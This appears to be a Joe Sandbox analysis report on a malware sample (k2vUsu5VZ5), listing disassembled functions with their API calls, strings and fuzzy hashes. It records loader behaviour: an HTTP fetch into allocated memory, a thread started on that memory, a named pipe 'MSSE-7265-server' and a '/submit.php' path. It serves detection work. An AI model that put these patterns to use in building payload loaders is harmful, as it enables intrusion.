                • Opcode Fuzzy Hash: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                • Instruction Fuzzy Hash: BB11E1B2214A80C6F714DF62F84975BBBA0F384749F44412ADB49277A8CB7CC445CF48
                Function 0388CA74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 268COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 181 388ca74-388cba2 call 389473c call 389489c * 2 call 3899a24 call 3899a34 * 2 call 3899a04 * 2 call 3899a24 * 2 call 389d1c8 call 3899a04 * 3 call 3899a34 call 389a728 call 389ca38 * 2 call 388eff8 220 388cba9-388cbbe call 3899a04 call 388ee1c 181->220 221 388cba4 call 389ba2c 181->221 227 388cbc0 call 389ba2c 220->227 228 388cbc5-388cbd3 call 388ee30 220->228 221->220 227->228 232 388cbda-388cbe1 call 388eeac 228->232 233 388cbd5 call 389ba2c 228->233 237 388cbe8-388cc1b call 3899a34 call 3899a04 call 389d1c8 232->237 238 388cbe3 call 389ba2c 232->238 233->232 246 388cc1d call 389ba2c 237->246 247 388cc22-388cc56 call 3899a04 call 389ca38 call 3899a04 call 38943b0 237->247 238->237 246->247 257 388ce48-388ce6c call 389d188 call 389ba2c 247->257 258 388cc5c-388cc68 247->258 260 388cc6d-388cd10 call 389a328 call 389d57c call 389a328 call 389d57c * 2 call 388e724 call 3899a04 call 388e6d0 258->260 280 388cd12-388cd20 call 3899314 260->280 281 388cd34-388cd37 260->281 290 388cd2e-388cd31 280->290 291 388cd22-388cd2c call 38973f8 280->291 282 388cd39-388cd5c call 3895220 call 3899a04 281->282 283 388cdb7 281->283 299 388cd5e 282->299 300 388cd63-388cd84 call 3890bbc call 3893894 call 3893314 call 388eff8 282->300 286 388cdbc-388cdc8 call 388e6a4 call 388eff8 283->286 301 388cdca call 389ba2c 286->301 302 388cdcf-388cdef call 389a26c 286->302 290->281 291->281 299->300 327 388cd8e-388cd95 300->327 328 388cd86-388cd89 call 388f0bc 300->328 301->302 309 388cdf1 call 389ba2c 302->309 310 388cdf6-388cdfe 302->310 309->310 310->257 313 388ce00-388ce08 310->313 315 388ce0a-388ce1b 313->315 316 388ce36 call 3891414 313->316 319 388ce1d-388ce2c call 388efd8 315->319 320 388ce2e 315->320 323 388ce3b-388ce42 316->323 325 388ce30-388ce32 319->325 320->325 323->257 323->260 325->316 326 388ce34 325->326 326->316 327->286 331 388cd97-388cdb5 call 388e6a4 call 388e724 call 388e8d8 327->331 328->327 331->286
                APIs
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                • malloc.LIBCMT ref: 0388CB1E
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                  • Part of subcall function 0389CA38: malloc.LIBCMT ref: 0389CA88
                  • Part of subcall function 0389CA38: realloc.LIBCMT ref: 0389CA97
                  • Part of subcall function 0388EFF8: GetLocalTime.KERNEL32 ref: 0388F017
                • malloc.LIBCMT ref: 0388CC10
                • _snprintf.LIBCMT ref: 0388CC8E
                • _snprintf.LIBCMT ref: 0388CCB6
                • free.LIBCMT ref: 0388CE4B
                  • Part of subcall function 03895220: GetTickCount.KERNEL32 ref: 03895232
                  • Part of subcall function 03895220: GetTickCount.KERNEL32 ref: 0389524A
                  • Part of subcall function 03895220: GetTickCount.KERNEL32 ref: 03895768
                  • Part of subcall function 03895220: GetTickCount.KERNEL32 ref: 0389577E
                  • Part of subcall function 03895220: shutdown.WS2_32 ref: 0389579D
                  • Part of subcall function 03895220: shutdown.WS2_32 ref: 038957B2
                  • Part of subcall function 03895220: closesocket.WS2_32 ref: 038957BC
                  • Part of subcall function 03895220: free.LIBCMT ref: 038957DC
                  • Part of subcall function 03895220: free.LIBCMT ref: 038957F1
                • _snprintf.LIBCMT ref: 0388CCDD
                  • Part of subcall function 0389BA2C: Sleep.KERNEL32 ref: 0389BA6F
                  • Part of subcall function 0389BA2C: ExitThread.KERNEL32 ref: 0389BA79
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTickmalloc$_snprintffree$_errnoshutdown$AllocExitHeapLocalSleepThreadTime_callnewhclosesocketrealloc
                • String ID: /submit.php
                • API String ID: 1707894466-1804779596
                • Opcode ID: 10656198658d24da70f1d1fe09ccb68bf04666c12815a9cb96f16df0a35652ad
                • Instruction ID: a77fe88197966f75317027c027bf313dc1eb4ecf1740cde6b3bc39c057ff5ccd
                • Opcode Fuzzy Hash: 10656198658d24da70f1d1fe09ccb68bf04666c12815a9cb96f16df0a35652ad
                • Instruction Fuzzy Hash: 5891A02970078146EF14FBF9A4507AE76E1EB89784F5880AA9D4ACF758EF38C509C712
                Function 00160128 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87networkmemoryfileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 353 160128-16014e HttpOpenRequestA 354 16014f-16016b 353->354 356 160171-160174 354->356 357 16030e-16032f VirtualAlloc 354->357 358 160306-160307 356->358 359 16017a 356->359 361 160331-16034e InternetReadFile 357->361 358->357 359->354 361->358 362 160350-160358 361->362 362->361 363 16035a-160364 362->363
                APIs
                • HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 00160143
                • VirtualAlloc.KERNELBASE ref: 00160328
                • InternetReadFile.WININET(00160136,00160136), ref: 00160346
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_160000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                • String ID: U.;
                • API String ID: 1187293180-4213443877
                • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                • Instruction ID: 751ff6e032cb7076eb5f9a7f01308509fe058f99036cb962a1ca986c7553b19d
                • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                • Instruction Fuzzy Hash: A8118E6034980D0BE61D94AE7C5A73711CAD7D8766F25812FB40EC3395EE54CC928029
                Function 00401704 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 364 401704-40175c CreateFileA 365 40179c-4017a5 364->365 366 40175e-401760 364->366 367 401781-40178f CloseHandle 366->367 368 401762-40177f ReadFile 366->368 367->365 368->367 369 401791-40179a 368->369 369->366
                APIs
                Strings
                • \\.\pipe\MSSE-7265-server, xrefs: 00401723
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: File$CloseCreateHandleRead
                • String ID: \\.\pipe\MSSE-7265-server
                • API String ID: 1035965006-1889910488
                • Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                • Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
                • Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                • Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08
                Function 0388EC4C Relevance: 4.6, APIs: 3, Instructions: 66networkCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 462 388ec4c-388ec87 call 388ed50 call 38b0660 467 388ec89-388ec8b 462->467 468 388ec90-388eccf WSAIoctl 462->468 469 388ed2e-388ed42 467->469 470 388ecec-388ecf6 468->470 471 388ecd1-388ece8 468->471 472 388ecf8 470->472 473 388ed23-388ed26 call 38b05e8 470->473 471->470 474 388ecfd-388ed07 472->474 478 388ed2c 473->478 476 388ed09-388ed0c 474->476 477 388ed0e-388ed1a 474->477 476->477 479 388ed1e 476->479 477->473 480 388ed1c 477->480 478->469 479->473 480->474
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: IoctlSocketStartupclosesocket
                • String ID:
                • API String ID: 365704328-0
                • Opcode ID: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
                • Instruction ID: 831ac441a258f6f320c87e1950613cb069c72813566492f454f75a1aeae76c7f
                • Opcode Fuzzy Hash: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
                • Instruction Fuzzy Hash: 7B21C17270478482D720DF68F480B5AB7A9F3887E8F5486A5EE9D83B88DF3CD5058B00
                Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47memorythreadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 481 401595-4015c5 VirtualAlloc 482 4015c7-4015c9 481->482 483 4015e0-40162c call 401563 VirtualProtect CreateThread 482->483 484 4015cb-4015de 482->484 484->482
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: Virtual$AllocCreateProtectThread
                • String ID:
                • API String ID: 3039780055-0
                • Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                • Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
                • Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                • Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708
                Function 004024E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 487 4024e0-4024fa call 402c50 490 402521-40252b 487->490 491 4024fc-4024ff 487->491 491->490 492 402501-40251a call 402a80 491->492 495 402530-402564 492->495 496 40251c 492->496 497 40259d-4025a8 call 402be0 495->497 496->490 500 402570-40259b 497->500 501 4025aa-4025ad 497->501 500->497 502 4025c0 500->502 501->496 503 4025b3-4025b6 501->503 504 4025c5-4025d5 RtlAddFunctionTable 502->504 503->504 504->496
                APIs
                  • Part of subcall function 00402A80: strncmp.MSVCRT ref: 00402AF5
                • RtlAddFunctionTable.KERNEL32 ref: 004025CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: FunctionTablestrncmp
                • String ID: .pdata
                • API String ID: 2984418122-4177594709
                • Opcode ID: c6e18efcf58cff98a9045297e69aa62fcdf93a67b7625ead96cd88321bade274
                • Instruction ID: e5bd22c7440726ce30c9019276c637b3f75865ec35e4e6d161c99b8f67d9ebd7
                • Opcode Fuzzy Hash: c6e18efcf58cff98a9045297e69aa62fcdf93a67b7625ead96cd88321bade274
                • Instruction Fuzzy Hash: 0511E4B2B11640AAFB15AF25DF2835A7751A788B94F58843ADF08277C4FABCC841C70C
                Function 001602CF Relevance: 3.1, APIs: 2, Instructions: 75memoryfilenetworkCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 505 1602cf 506 1602d0 505->506 507 1602d4 506->507 508 1602d1-1602d3 506->508 509 1602d5-1602d6 507->509 510 160329-16032f 507->510 508->507 509->506 511 1602d8-1602fd 509->511 512 160331-16034e InternetReadFile 510->512 513 1602c6-1602ce 511->513 514 1602ff-16030b 511->514 515 160306-160307 512->515 516 160350-160358 512->516 517 16030e-160328 VirtualAlloc 514->517 515->517 516->512 518 16035a-160364 516->518 517->510
                APIs
                • VirtualAlloc.KERNELBASE ref: 00160328
                • InternetReadFile.WININET(00160136,00160136), ref: 00160346
                Memory Dump Source
                • Source File: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_160000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AllocFileInternetReadVirtual
                • String ID:
                • API String ID: 3591508208-0
                • Opcode ID: f47fa78e1a991d802dd4d353d04a50c163f7d50401d5ec175728bd6b7eb19422
                • Instruction ID: d0f884f866c1d3fb1d3f4f4075e719864c4262cf32adbf4e852530cdd7eda062
                • Opcode Fuzzy Hash: f47fa78e1a991d802dd4d353d04a50c163f7d50401d5ec175728bd6b7eb19422
                • Instruction Fuzzy Hash: 2C114E3120450A0FD72A99C4BCA53B77395EB88325F70403FE44EC7242DA64CC67D356
                Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                  • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                  • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                  • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                • SleepEx.KERNELBASE(?,?,00000001,004013B4), ref: 0040305D
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: Sleep$CountCreateThreadTickmalloc
                • String ID:
                • API String ID: 345437100-0
                • Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                • Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
                • Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                • Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E
                Function 034979EB Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                • Instruction ID: a743adea046cbcdbe664945421fd1e17160cbf4519ce10af676c80aa3e6907ac
                • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                • Instruction Fuzzy Hash: 4D418970618B499FDB84DF2CC488A2ABBE1FB98355F44196EF489C7360D734D981CB06

                Non-executed Functions

                Function 038A43D4 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_invalid_parameter_noinfo
                • String ID: U
                • API String ID: 3902385426-4171548499
                • Opcode ID: b04278913bfdb2d86bd3fcf39d809e6593f3198cef3e5a228a6e35f7ed4bf705
                • Instruction ID: 8de59dba9c6b2139ae8c7a1a23e9036743507b11ab1ac6917d3c95410e6c3b32
                • Opcode Fuzzy Hash: b04278913bfdb2d86bd3fcf39d809e6593f3198cef3e5a228a6e35f7ed4bf705
                • Instruction Fuzzy Hash: 43022272214B8586EF20CFAED48435EB765F385B88F684156EA89C7B24DFBCD146CB10
                Function 03896CB0 Relevance: 46.5, APIs: 22, Strings: 4, Instructions: 1045COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: htonl$ErrorLast
                • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                • API String ID: 3987040240-1833344708
                • Opcode ID: d68524a15420e28e89f7ae59b3e64a120402265f83246d642d5de9aedb9eafd5
                • Instruction ID: e21dd5bacc1809d1804c2156d2d927bc178ecfd7537628b5917aae25bab926d7
                • Opcode Fuzzy Hash: d68524a15420e28e89f7ae59b3e64a120402265f83246d642d5de9aedb9eafd5
                • Instruction Fuzzy Hash: A1722A15B2474586FF28DBE6A850379A291F789B84F8C41E7ED0EC7B58EE39C642C701
                Function 038A0E90 Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 038A0EF1
                  • Part of subcall function 0389F454: _getptd.LIBCMT ref: 0389F46A
                  • Part of subcall function 0389F454: __updatetlocinfo.LIBCMT ref: 0389F49F
                  • Part of subcall function 0389F454: __updatetmbcinfo.LIBCMT ref: 0389F4C6
                • _errno.LIBCMT ref: 038A0EF6
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _fileno.LIBCMT ref: 038A0F23
                  • Part of subcall function 038A3914: _errno.LIBCMT ref: 038A391D
                  • Part of subcall function 038A3914: _invalid_parameter_noinfo.LIBCMT ref: 038A3928
                • write_multi_char.LIBCMT ref: 038A155F
                • write_string.LIBCMT ref: 038A157C
                • write_multi_char.LIBCMT ref: 038A1599
                • write_string.LIBCMT ref: 038A15F8
                • write_string.LIBCMT ref: 038A162F
                • write_multi_char.LIBCMT ref: 038A1651
                • free.LIBCMT ref: 038A1665
                • _isleadbyte_l.LIBCMT ref: 038A1736
                • write_char.LIBCMT ref: 038A174C
                • write_char.LIBCMT ref: 038A176D
                • _errno.LIBCMT ref: 038A1870
                • _invalid_parameter_noinfo.LIBCMT ref: 038A187B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID: $@
                • API String ID: 3318157856-1077428164
                • Opcode ID: aca5eff7b48e60a8575da89cd2ec2425052cdd0f99735d1b91aa5be48c8f36fa
                • Instruction ID: 1897a01ee32fd283fd75b4c5055da408a3549694d2cf17511adc746fd3f01c35
                • Opcode Fuzzy Hash: aca5eff7b48e60a8575da89cd2ec2425052cdd0f99735d1b91aa5be48c8f36fa
                • Instruction Fuzzy Hash: B8420372608F9886FB25CBEDD54837EABA5F741B88F1C5086DE46D7A98DB78C540CB00
                Function 038A03DC Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 038A043D
                  • Part of subcall function 0389F454: _getptd.LIBCMT ref: 0389F46A
                  • Part of subcall function 0389F454: __updatetlocinfo.LIBCMT ref: 0389F49F
                  • Part of subcall function 0389F454: __updatetmbcinfo.LIBCMT ref: 0389F4C6
                • _errno.LIBCMT ref: 038A0442
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _fileno.LIBCMT ref: 038A046F
                  • Part of subcall function 038A3914: _errno.LIBCMT ref: 038A391D
                  • Part of subcall function 038A3914: _invalid_parameter_noinfo.LIBCMT ref: 038A3928
                • write_multi_char.LIBCMT ref: 038A0A9F
                • write_string.LIBCMT ref: 038A0ABC
                • write_multi_char.LIBCMT ref: 038A0AD9
                • write_string.LIBCMT ref: 038A0B38
                • write_string.LIBCMT ref: 038A0B6F
                • write_multi_char.LIBCMT ref: 038A0B91
                • free.LIBCMT ref: 038A0BA5
                • _isleadbyte_l.LIBCMT ref: 038A0C76
                • write_char.LIBCMT ref: 038A0C8C
                • write_char.LIBCMT ref: 038A0CAD
                • _errno.LIBCMT ref: 038A0DA7
                • _invalid_parameter_noinfo.LIBCMT ref: 038A0DB2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID:
                • API String ID: 3318157856-3916222277
                • Opcode ID: 442108010190e59218a5984551b34ec8e46758b4fb98f8e7cd36874cc15003ad
                • Instruction ID: 7900f1a16edf4d03393bdda8915d6e0e3452eeeafffb2facfc70cbb6161a9d9b
                • Opcode Fuzzy Hash: 442108010190e59218a5984551b34ec8e46758b4fb98f8e7cd36874cc15003ad
                • Instruction Fuzzy Hash: 853231F2608F8886FB24CBEDD9443BEABA4B745788F1C5086DE8AC7654DB78D541CB01
                Function 034A02D7 Relevance: 30.8, APIs: 15, Strings: 2, Instructions: 1030COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0349E89B: _getptd.LIBCMT ref: 0349E8B1
                  • Part of subcall function 0349E89B: __updatetlocinfo.LIBCMT ref: 0349E8E6
                  • Part of subcall function 0349E89B: __updatetmbcinfo.LIBCMT ref: 0349E90D
                • _errno.LIBCMT ref: 034A033D
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _fileno.LIBCMT ref: 034A036A
                  • Part of subcall function 034A2D5B: _errno.LIBCMT ref: 034A2D64
                  • Part of subcall function 034A2D5B: _invalid_parameter_noinfo.LIBCMT ref: 034A2D6F
                • write_multi_char.LIBCMT ref: 034A09A6
                • write_string.LIBCMT ref: 034A09C3
                • write_multi_char.LIBCMT ref: 034A09E0
                • write_string.LIBCMT ref: 034A0A3F
                • write_multi_char.LIBCMT ref: 034A0A98
                • free.LIBCMT ref: 034A0AAC
                • _isleadbyte_l.LIBCMT ref: 034A0B7D
                • write_char.LIBCMT ref: 034A0B93
                • write_char.LIBCMT ref: 034A0BB4
                • _errno.LIBCMT ref: 034A0CB7
                • _invalid_parameter_noinfo.LIBCMT ref: 034A0CC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID: $@
                • API String ID: 3613058218-1077428164
                • Opcode ID: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
                • Instruction ID: 2a8d59ffd3274e259ab46c70ca1a1060c0aa53412f494e132359aee611b7618f
                • Opcode Fuzzy Hash: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
